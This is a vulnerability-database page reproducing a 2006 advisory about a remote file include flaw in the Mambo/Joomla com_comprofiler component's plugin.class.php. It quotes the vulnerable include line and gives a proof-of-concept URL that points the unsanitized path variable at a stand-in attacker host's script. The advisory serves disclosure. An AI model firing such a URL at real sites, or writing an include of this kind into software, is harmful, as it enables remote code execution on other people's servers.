Lucene search

comcomprofiler.txt

🗓️ 28 Aug 2006 00:00:00Reported by MatdhuleType

packetstorm🔗 packetstormsecurity.com👁 65 Views

Mambo/Joomla com_comprofiler v1.0 RC 2 Remote File Include Vulnerability in plugin.class.ph

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`---------------------------------------------------------------------------  
Mambo/Joomla com_comprofiler Components <== v1.0 RC 2 Multiple Remote File Include Vulnerabilities  
---------------------------------------------------------------------------  
  
Author : Matdhule  
Date : August, 25th 2006  
Location : Indonesia, Jakarta  
Critical Lvl : Highly critical  
Impact : System access  
Where : From Remote  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
com_comprofiler Components  
  
Application : com_comprofiler  
version : 1.0 RC 2  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~  
  
in folder com_comprofiler we found vulnerability script plugin.class.php  
  
-----------------------plugin.class.php----------------------  
<?php  
/**  
* Plugin handler  
* @package Joomla  
* @author various, JoomlaJoe and Beat  
*/  
  
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );  
  
----------------------------------------------------------  
  
Variables $mosConfig_absolute_path are not properly sanitized.  
  
Proof Of Concept:  
~~~~~~~~~~~~~~~~  
  
http://[target]/[path]/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= http://attacker.com/evil.txt?  
  
Solution:  
~~~~~~~~  
  
sanitize variabel $mosConfig_absolute_path in plugin.class.php  
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)  
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous  
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama  
~ [email protected], [email protected]  
~ #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~  
  
matdhule[at]gmail[dot]com  
  
-------------------------------- [ EOF ] ----------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

28 Aug 2006 00:00Current

7.4High risk

Vulners AI Score7.4